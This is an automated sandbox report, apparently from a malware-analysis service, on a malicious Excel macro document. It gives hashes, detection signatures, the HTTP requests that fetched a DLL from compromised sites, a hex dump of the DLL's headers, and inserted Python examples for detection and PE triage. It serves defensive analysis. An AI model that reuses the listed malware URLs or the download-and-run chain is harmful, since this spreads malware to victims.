Windows Analysis Report sin t#U00edtulo_0212.xlsm

Overview

General Information

Sample Name: sin t#U00edtulo_0212.xlsm
Analysis ID: 532947
MD5: 382f6c1c7508996537bfd33fc5e884af
SHA1: 5143a3cce279c8e70c7a2aa366a78b2583de9025
SHA256: 5d0311243534a50b4fffa6bb32a952f86e51194d372741b30dbea12c51eb4c44

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormally high CPU usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Yara detected Xls With Macro 4.0
Drops PE files to the user directory
Excel document contains an embedded macro which executes code when the document is opened
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: sin t#U00edtulo_0212.xlsm Virustotal: Detection: 22%
Antivirus detection for URL or domain
Source: http://www.duoyuhudong.cn/wp-content/we8xi/ooC: Avira URL Cloud: Label: malware
Source: http://www.duoyuhudong.cn/wp-content/we8xi/T Avira URL Cloud: Label: malware
Source: http://www.duoyuhudong.cn/wp-content/we8xi/R Avira URL Cloud: Label: malware
Source: http://www.duoyuhudong.cn/wp-content/we8xi/ Avira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E46B531 FindFirstFileExA, 3_2_6E46B531

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: Z8LJs4fFM8[1].dll.0.dr
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dll
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe
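Worked example (added here; it is neither the sandbox's code nor the Sigma project's rule): the parent/child test behind the "Microsoft Office Product Spawning Windows Shell" detection that fired on this EXCEL.EXE -> rundll32.exe start, correlated with the PE files the same Excel process wrote beforehand (the report's Z8LJs4fFM8[1].dll and besta.ocx). The event timeline, PIDs and timestamps are constructed; the image paths and file names are the report's; the Office-parent and child-process name lists are this example's own and not the published rule's selection.

```python
"""Added example, not part of the sandbox report: Office-spawns-shell detection
over constructed process-creation and file-creation events, enriched with the
PE files the Office parent dropped shortly before the spawn."""
import ntpath
from dataclasses import dataclass

# This example's own lists (ASSUMPTION: not the published Sigma rule's selection).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
                  "msiexec.exe", "bitsadmin.exe", "schtasks.exe"}
LOOKBACK_SECONDS = 300            # window in which a PE drop by the parent counts


@dataclass
class ProcessCreate:              # Sysmon EID 1 / EDR process-start shape
    ts: float
    pid: int
    image: str
    ppid: int
    parent_image: str


@dataclass
class FileCreate:                 # Sysmon EID 11 shape plus the file's first two bytes
    ts: float
    pid: int                      # writing process
    path: str
    magic: bytes                  # constructed here; the sandbox judged PE-ness by content


def _name(path):
    return ntpath.basename(path).lower()


def office_spawns_shell(ev):
    """The core Sigma-style condition: Office parent, shell/LOLBin child."""
    return (isinstance(ev, ProcessCreate)
            and _name(ev.parent_image) in OFFICE_PARENTS
            and _name(ev.image) in SHELL_CHILDREN)


def detect(events):
    """One alert per Office->shell spawn, listing PE files the parent wrote in the
    lookback window (the report's 'Office process drops PE file' observation)."""
    events = sorted(events, key=lambda e: e.ts)
    alerts = []
    for ev in events:
        if not office_spawns_shell(ev):
            continue
        dropped = [f.path for f in events
                   if isinstance(f, FileCreate) and f.pid == ev.ppid and f.magic == b"MZ"
                   and ev.ts - LOOKBACK_SECONDS <= f.ts <= ev.ts]
        alerts.append({"parent": _name(ev.parent_image), "child": _name(ev.image),
                       "child_pid": ev.pid, "dropped_pe": dropped,
                       "severity": "high" if dropped else "medium"})
    return alerts


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EXPLORER = r"C:\Windows\explorer.exe"
TIF = r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
SAMPLE_EVENTS = [                 # constructed timeline; paths from the report
    ProcessCreate(0.0, 2020, EXCEL, 1000, EXPLORER),                 # user opens the workbook
    FileCreate(5.0, 2020, TIF + r"\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dll", b"MZ"),
    FileCreate(6.0, 2020, r"C:\Users\user\besta.ocx", b"MZ"),
    FileCreate(7.0, 2020, TIF + r"\Content.MSO\30817388.png", b"\x89P"),  # image, not PE
    ProcessCreate(8.0, 3030, r"C:\Windows\SysWOW64\rundll32.exe", 2020, EXCEL),
    ProcessCreate(9.0, 4040, r"C:\Windows\System32\notepad.exe", 1000, EXPLORER),  # benign
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

In production telemetry the file-content magic is not available from Sysmon EID 11 alone, so the enrichment would key on extension or on a later scan of the dropped file; the parent/child condition itself needs only ParentImage and Image, and the rundll32.exe command line (which this report does not show) is what you would pivot on next.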
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: sadabahar.com.np
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Thu, 02 Dec 2021 20:22:20 GMT
Content-Type: application/x-msdownload
Content-Length: 460288
Connection: keep-alive
X-Powered-By: PHP/7.2.15
Set-Cookie: 61a92afcad18b=1638476540; expires=Thu, 02-Dec-2021 20:23:20 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 02 Dec 2021 20:22:20 GMT
Expires: Thu, 02 Dec 2021 20:22:20 GMT
Content-Disposition: attachment; filename="Z8LJs4fFM8.dll"
Content-Transfer-Encoding: binary
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 0d e9 1a ec 6c 87 49 ec 6c 87 49 ec 6c 87 49 9f 0e 84 48 e1 6c 87 49 9f 0e 82 48 71 6c 87 49 9f 0e 83 48 fa 6c 87 49 be 19 82 48 bf 6c 87 49 be 19 83 48 fc 6c 87 49 be 19 84 48 fb 6c 87 49 9f 0e 81 48 ef 6c 87 49 9f 0e 86 48 fd 6c 87 49 ec 6c 86 49 37 6c 87 49 59 19 8e 48 e3 6c 87 49 59 19 87 48 ed 6c 87 49 59 19 78 49 ed 6c 87 49 ec 6c 10 49 ed 6c 87 49 59 19 85 48 ed 6c 87 49 52 69 63 68 ec 6c 87 49 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 66 ff a8 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 76 03 00 00 9a 03 00 00 00 00 00 4e 4b 01 00 00 10 00 00 00 90 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 07 00 00 04 00 00 a1 2d 07 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 91 04 00 a0 08 00 00 50 9a 04 00 b4 00 00 00 00 e0 04 00 48 2a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 00 bc 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 56 04 00 40 00 00 00 00 
00 00 00 00 00 00 00 00 90 03 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 75 03 00 00 10 00 00 00 76 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 1a 01 00 00 90 03 00 00 1c 01 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 23 00 00 00 b0 04 00 00 16 00 00 00 96 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 48 2a 02 00 00 e0 04 00 00 2c 02 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 2c 00 00 00 10 07 00 00 2e 00 00 00 d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ
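Worked example (added here; not the sandbox's code): a triage of the response above that cross-checks the transport metadata against the PE headers carried in the body. The response head and the first 0x2d0 bytes of the body are transcribed from the dump above; the one assumption is that bytes 0x40-0x10f (the DOS stub and Rich header) are replaced with zero padding, which the parser never reads.

```python
"""Added example, not part of the sandbox report: cross-check the captured HTTP
response against the PE headers in its body.  RESPONSE_HEAD and the first
0x2d0 body bytes are transcribed from the report's dump; bytes 0x40-0x10f
(DOS stub and Rich header) are zero-filled (ASSUMPTION) as nothing reads them."""
import struct

IMAGE_FILE_DLL = 0x2000            # IMAGE_FILE_HEADER.Characteristics bit
IMAGE_FILE_MACHINE_I386 = 0x14C

RESPONSE_HEAD = (                  # status line and the headers the triage uses
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/x-msdownload\r\n"
    "Content-Length: 460288\r\n"
    'Content-Disposition: attachment; filename="Z8LJs4fFM8.dll"\r\n'
    "\r\n"
)

_PARTS = [
    # IMAGE_DOS_HEADER 0x00-0x3f; e_lfanew at 0x3c = 0x110
    "4d5a90000300000004000000ffff0000", "b8000000000000004000000000000000",
    "00000000000000000000000000000000", "00000000000000000000000010010000",
    "00" * (0x110 - 0x40),          # ASSUMPTION: DOS stub + Rich header zeroed
    # "PE\0\0", IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    "50450000", "4c01", "0500", "66ffa861", "00000000", "00000000", "e000", "0221",
    # IMAGE_OPTIONAL_HEADER32 fixed part, Magic .. NumberOfRvaAndSizes (96 bytes)
    "0b01", "0e1d", "00760300", "009a0300", "00000000", "4e4b0100", "00100000",
    "00900300", "00000010", "00100000", "00020000", "06000000", "00000000",
    "06000000", "00000000", "00400700", "00040000", "a12d0700", "0200", "4001",
    "00001000", "00100000", "00001000", "00100000", "00000000", "10000000",
    # 16 data directories (RVA, Size); empty ones written as zero runs
    "b0910400a0080000", "509a0400b4000000", "00e00400482a0200", "00" * 16,
    "00100700bc2c0000", "00" * 32, "d856040040000000", "00" * 8,
    "00900300fc020000", "00" * 24,
    # 5 IMAGE_SECTION_HEADERs: Name, VirtualSize, VirtualAddress, SizeOfRawData,
    # PointerToRawData, 12 bytes of reloc/linenumber fields, Characteristics
    "2e74657874000000", "8c750300", "00100000", "00760300", "00040000", "00" * 12, "20000060",
    "2e72646174610000", "901a0100", "00900300", "001c0100", "007a0300", "00" * 12, "40000040",
    "2e64617461000000", "8c230000", "00b00400", "00160000", "00960400", "00" * 12, "400000c0",
    "2e72737263000000", "482a0200", "00e00400", "002c0200", "00ac0400", "00" * 12, "40000040",
    "2e72656c6f630000", "bc2c0000", "00100700", "002e0000", "00d80600", "00" * 12, "40000042",
]
BODY_PREFIX = bytes.fromhex("".join(_PARTS))


def parse_pe(data):
    """Extract triage-relevant fields from the DOS, file, optional and section headers."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    fh = e_lfanew + 4
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20
    magic, = struct.unpack_from("<H", data, opt)
    entry, = struct.unpack_from("<I", data, opt + 16)
    checksum, = struct.unpack_from("<I", data, opt + 64)    # same offset for PE32 and PE32+
    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        flags, = struct.unpack_from("<I", data, off + 36)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "vsize": vsize, "va": va,
                         "raw_size": raw_size, "raw_ptr": raw_ptr, "flags": flags})
    return {"machine": machine, "timestamp": stamp, "characteristics": chars,
            "is_dll": bool(chars & IMAGE_FILE_DLL), "magic": magic,
            "entry_point": entry, "checksum": checksum, "sections": sections}


def parse_head(raw):
    """Split a raw response head into (status line, {lowercased name: value})."""
    status, _, rest = raw.partition("\r\n")
    headers = {}
    for line in rest.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def triage_response(head, body_prefix):
    """Say why the transfer looks like a PE download and whether the sizes agree."""
    status, h = parse_head(head)
    pe = parse_pe(body_prefix)
    # The last section's raw data ends where the linker stopped writing; bytes the
    # server sends beyond that are overlay, fewer bytes mean a truncated file.
    expected = max(s["raw_ptr"] + s["raw_size"] for s in pe["sections"])
    content_length = int(h.get("content-length", "0"))
    reasons = []
    if h.get("content-type") == "application/x-msdownload":
        reasons.append("Content-Type declares a Windows executable")
    if h.get("content-disposition", "").lower().endswith('.dll"'):
        reasons.append("Content-Disposition names a .dll")
    if pe["is_dll"]:
        reasons.append("IMAGE_FILE_DLL set: a DLL, consistent with rundll32.exe as loader")
    if expected == content_length:
        reasons.append("section table accounts for every byte of Content-Length (no overlay)")
    else:
        reasons.append("Content-Length differs from section-table end by %d bytes" % (content_length - expected))
    return {"status": status, "pe": pe, "expected_size": expected,
            "content_length": content_length, "reasons": reasons}


if __name__ == "__main__":
    result = triage_response(RESPONSE_HEAD, BODY_PREFIX)
    print(result["status"], hex(result["expected_size"]), result["content_length"])
    for reason in result["reasons"]:
        print(" -", reason)
```

Two facts fall out of the headers alone: the TimeDateStamp 0x61a8ff66 is 2021-12-02 17:16:22 UTC, about three hours before the Date header and the Set-Cookie timestamp (1638476540 = 20:22:20 UTC), and the section table ends at exactly 0x70600 = 460288 bytes, the advertised Content-Length, so the DLL was served whole with no overlay. The CheckSum field is a non-zero 0x72da1; the report's "PE file contains an invalid checksum" finding can only be reproduced over the full 460288-byte file, not this prefix.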
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /wp-includes/pUMqITCt83a/ HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: sadabahar.com.np
Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
GET /wp-content/we8xi/ HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.duoyuhudong.cn
Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
x-powered-by: PHP/7.4.25
content-type: text/html; charset=UTF-8
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
link: <https://sadabahar.com.np/wp-json/>; rel="https://api.w.org/"
transfer-encoding: chunked
content-encoding: gzip
vary: Accept-Encoding,User-Agent
date: Thu, 02 Dec 2021 20:22:19 GMT
server: LiteSpeed
Data Raw: 31 30 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5b ff 73 db 36 b2 ff d9 fe 2b 60 7a 6a 8b 2d 49 51 92 65 59 94 e5 de 35 4d e7 fd d0 5e 6f 9a 76 de bc 49 f2 3c 10 09 51 48 28 80 0f 80 64 fb 14 fd ef 37 0b 90 14 bf c9 56 9c a4 b9 99 d7 78 1c 93 c0 62 b1 58 2c b0 9f 5d 80 d7 27 3f fe fa e2 f7 ff f9 e7 4b b4 50 cb e4 e6 f8 1a fe a0 04 b3 78 6a 11 e6 fe f1 ca ba 39 3e be 5e 10 1c dd 1c 1f 5d 2f 89 c2 28 5c 60 21 89 9a 5a 7f fc fe 93 7b 65 15 e5 0c 2f c9 d4 5a 53 72 97 72 a1 2c 14 72 a6 08 53 53 eb 8e 46 6a 31 8d c8 9a 86 c4 d5 2f 0e a2 8c 2a 8a 13 57 86 38 21 d3 9e 83 96 94 d1 e5 6a 99 17 68 b6 09 65 ef 91 20 c9 d4 4a 05 9f d3 84 58 68 21 c8 7c 6a 2d 94 4a 83 6e 37 5e a6 b1 c7 45 dc bd 9f b3 6e af 07 6d 8e ae 15 55 09 b9 f9 27 8e 09 62 5c a1 39 5f b1 08 9d 9d 5e f5 7b bd 09 7a 85 23 3c c3 0b 2c d0 2f ab 44 51 f4 82 33 a9 c4 2a 54 94 b3 eb ae 69 7a 6c 86 a9 87 73 2e f8 8c 2b 79 5e 0c e6 7c 89 ef 5d ba c4 31 71 53 41 60 b0 41 82 45 4c ce 51 f7 e6 f8 ba 10 f8 3c 62 12 08 e6 44 85 8b 73 23 f5 79 b7 3b e7 4c 49 2f e6 3c 4e 08 4e a9 f4 42 be 3c ac a5 f4 ee 60 a4 35 62 0b 27 8a 08 86 15 b1 90 7a 48 c9 d4 c2 69 9a d0 10 c3 78 ba 42 ca ef ee 97 89 85 f4 b8 a6 d6 63 83 47 67 02 ff df 8a 4f d0 4f 84 44 65 35 cb a0 db 95 b9 d6 40 5e 8f a5 dd 39 21 51 d7 aa 0e f9 0b c8 f2 82 2f 97 84 29 79 98 50 61 46 5d 92 ee e8 e8 5a 86 82 a6 2a d3 8e 22 f7 aa fb 0e af b1 29 d5 06 73 74 47 59 c4 ef bc db bb 94 2c f9 3b fa 8a 28 45 59 2c d1 14 6d ac 19 96 e4 0f 91 58 81 36 39 19 bc e9 be e9 66 53 f1 a6 ab cd 40 be e9 86 5c 
90 37 5d dd f8 4d b7 37 f0 7a 9e ff a6 3b ea df 8f fa 6f ba 96 63 91 7b 65 05 96 97 b2 d8 72 2c b9 8e 9f c7 4f ae 63 cd 4d ae e3 97 86 a1 5c 6b 86 7c 25 42 62 05 1b 2b e4 2c c4 4a 8b 91 c9 6b c4 ad 4d de 9b ee 5d ea 52 16 26 ab 88 c8 37 dd 77 52 17 e8 66 ae 20 09 c1 92 78 4b ca bc 77 f2 fb 35 11 d3 a1 77 e5 f5 ad ed 76 72 7c 74 74 74 32 5f 31 bd 56 3a c4 c1 8e b2 37 6b 2c 10 73 84 c3 1d 3a c5 5e 28 08 56 e4 65 42 60 d6 3a 56 88 d9 1a 4b cb 76 d2 29 f5 62 a2 5e c0 86 70 af ce ce ca 6f 1d ab 1f 59 f6 24 67 8c 64 87 e4 8c f1 f4 95 12 94 c5 de 5c f0 e5 8b 05 16 2f 78 44 26 a9 17 26 04 8b df 48 a8 3a be e3 3b d4 33 5b 0a f5 16 84 c6 0b 65 3b a9 37 a7 49 f2 3b b9 57 1d ec c1 82 78 e8 a8 05 95 0e b1 1d df f1 ed 09 99 52 4f f1 1f b1 c2 7f fc f6 73 c7 9e 08 a2 56 82 a1 e7 33 56 86 b1 43 a6 d3 2a eb 6d 31 ac b0 43 8c b6 54 53 4f 99 31 da 13 e5 49 11 4e 89 a3 bc 88 cc 89 98 2a cf 2c ea ba d9 3a 18 d4 99 e9 59 fe f0 f0 3b 8e ff 81 97 a4 63 c1 3e 6d d9 af fd b7 30 6c c2 a2 17 0b 9a 44 1d 65 6f e7 5c 74 f8 f4 ef 42 e0 87
Source: EXCEL.EXE, 00000000.00000002.761699674.000000000598F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537570017.000000000598F000.00000004.00000001.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.coma/l equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EXCEL.EXE, 00000000.00000002.761699674.000000000598F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537570017.000000000598F000.00000004.00000001.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.c
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.co
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.n
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/w
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-i
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-inc
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-inclu
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/p
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqI
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sad
Source: EXCEL.EXE, 00000000.00000002.759328902.0000000004E87000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/
Source: EXCEL.EXE, 00000000.00000002.763332521.0000000007846000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763362323.00000000078B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763353530.0000000007886000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763307650.0000000007716000.00000004.00000001.sdmp String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000002.763332521.0000000007846000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
Source: EXCEL.EXE, 00000000.00000002.763307650.0000000007716000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000002.763362323.00000000078B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763353530.0000000007886000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: EXCEL.EXE, 00000000.00000002.759328902.0000000004E87000.00000004.00000001.sdmp String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/R
Source: EXCEL.EXE, 00000000.00000002.759328902.0000000004E87000.00000004.00000001.sdmp String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/T
Source: EXCEL.EXE, 00000000.00000002.750052025.000000000051C000.00000004.00000020.sdmp String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/ooC:
Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
